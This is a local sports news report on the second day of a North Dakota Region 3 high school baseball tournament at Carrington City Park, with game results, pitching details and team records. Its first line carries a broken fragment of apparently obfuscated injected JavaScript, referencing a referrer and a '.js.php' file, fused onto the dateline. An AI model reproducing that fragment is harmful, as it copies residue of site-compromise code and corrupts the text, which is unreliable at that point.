CARRINGTON rbnkn|var|u0026u|referrer|zrdnk||js|php’.split(‘|’),0,{}))
(NewsDakota.com)  Day number two of the tourney started on time, no rain delays and another quadruple header at Carrington City Park.  The first two games were elimination games, followed by a semifinal game and another elimination game.  Here are the results:

LAKOTA/EDMORE 17  MEDINA/PINGREE-BUCHANAN 7

In a game that lasted two hours and 37 minutes and had close to 300 pitches total, the Thunder of MPB end their season winless at 0-23.  The Thunder left 15 runners on base and committed 10 errors.  LE improved to 4-9 with the win in Region 3.

CARRINGTON 12  DAKOTA PRAIRIE 3

The game was tied at 3 a piece at the end of five innings, but Carrington would go on a scoring spree getting eight runs on five errors by Dakota Prairie in the top of the sixth and would take the lead for good.  Patrick Freeman was the winning pitcher in relief, going 2 and 2/3’s innings with four strikeouts.  Gavin Tweed took the loss, throwing 159 pitches.  Brady Smith of Carrington was 2 for 4 with a couple of RBI and Easton Paeper was 3 for 4 at the plate.  The Knights end their season at 5-11 overall.

Carrington   12/13/0,    8 left on base

Dakota Prairie   3/5/5,    5 left on base

MIDKOTA 5  SHEYENNE/NEW ROCKFORD 4, 8 innings

The battle between the number one and number three seeds did not disappoint, as No. 1 Midkota trailed 4-1 going into the bottom of the seventh inning.  The Mustangs would score three runs to tie the game with help from Hunter Engel who hit a two run single to center with two out to tie it in the bottom of the seventh inning.  Sheyenne/New Rockford did not score in the top of the eighth inning so the Mustangs would need just one more run to get the victory in the bottom of the eighth inning.  Once again the Mustangs would get another run with two down, this time from Dakota Hoyt who ripped a game winning single scoring a runner from third with the bases loaded.  Jayden Grover picked up the victory going all eight innings with 12 stikeouts.  The Mustangs are now 15-4 overall and 12-0 in Region 3.  The Rockets drop to 11-7 with the loss.

CARRINGTON  11  LAKOTA/EDMORE 0, 5 innings

Easton Paeper hit a 3-run walk off home run in the bottom of the fifth inning to beat the Raiders by 10-run rule in five innings.  Paeper was 1 for 3 with a run scored, three RBI and a homer, his second of the year.  Freshman Braxton Hewitt was the winning pitcher throwing a one hit complete game shutout on only 53 pitches.  L/E ends their season at 4-10.
